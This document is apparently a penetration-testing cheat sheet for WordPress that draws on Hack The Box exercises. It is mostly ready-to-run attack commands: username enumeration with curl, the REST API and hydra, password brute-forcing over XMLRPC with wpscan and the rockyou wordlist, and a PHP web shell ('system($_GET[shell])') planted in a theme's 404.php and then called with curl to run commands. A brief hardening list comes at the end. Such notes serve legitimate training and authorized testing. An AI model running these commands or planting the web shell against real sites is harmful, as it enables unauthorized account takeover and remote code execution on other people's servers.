# method

## Username enum

**MEHTOD 1**

```
#Check out the posts
curl -s -I http://"$domain"/?author=1
#Change author value to get username
```

```
# Automation Script
curl -s "$ip" | grep 'class=\"wp-block-post-author-name' | awk -F __link\"\> '{print $2}' | awk -F \</a\> '{print $1}'
```

**METHOD 2 (JQ)**

```
curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq
index.php/wp-json/wp/v2/users/?per_page=100&page=1
```

**METHOD 3 (hydra)**

```
hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://"$domain"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&testcookie=1:F=not registered on this site"
```

***

## Login brute-force XMLRPC

**Manual**

```
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://"$domain"/xmlrpc.php
#403 - wrong password
```

**Automatic with tool**

```
sudo wpscan --password-attack xmlrpc -t 20 -U john,david -P /usr/share/wordlists/rockyou.txt --url http://"$domain"/
```

```
							OR
```

```
#Aggressive scan
wpscan --api-token **** --url "$ip"  -e ap,vt,tt,cb,dbe,u1-10,m1-50 --plugins-detection aggressive --plugins-version-detection aggressive --detection-mode aggressive
```

## Is XMLRPC enabled?

> CTF: HTB: Pressed | 0xdf hacks stuff

**Get list of methods**

```
curl -s --data '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' http://"$domain"/xmlrpc.php
```

**Use methods**

```
curl -s --data '<methodCall><methodName>wp.getUsersBlogs</methodName><params></params></methodCall>' http://"$domain"/xmlrpc.php
```

**Interact with XMLRPC using python**

```
pip3 install python-wordpress-xmlrpc
```

## Remote code execution (required credentials)

**Payload**

```
system($_GET[shell]);
```

**Exploit**

```
Put the payload in the 404.php page of the Appearance > Theme editor.
```

**Run commands**

```
curl http://"$domain"/wp-content/themes/twentyseventeen/404.php?cmd=id
curl http://blog."$domain"/wp-content/themes/twentynineteen/404.php?0=id
```

## Leveraging known vulnerabilities

```
Look at the older version of the site using waybackurls
We may get a plugin with known vulnerability which is not fully removed.
```

### WordPress hardening

**Update WordPress to the latest version**

```
Keep these config.php
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```

**WordPress security plugins**

```
Sucuri Security
Ithemes Security
Wordfence Security
```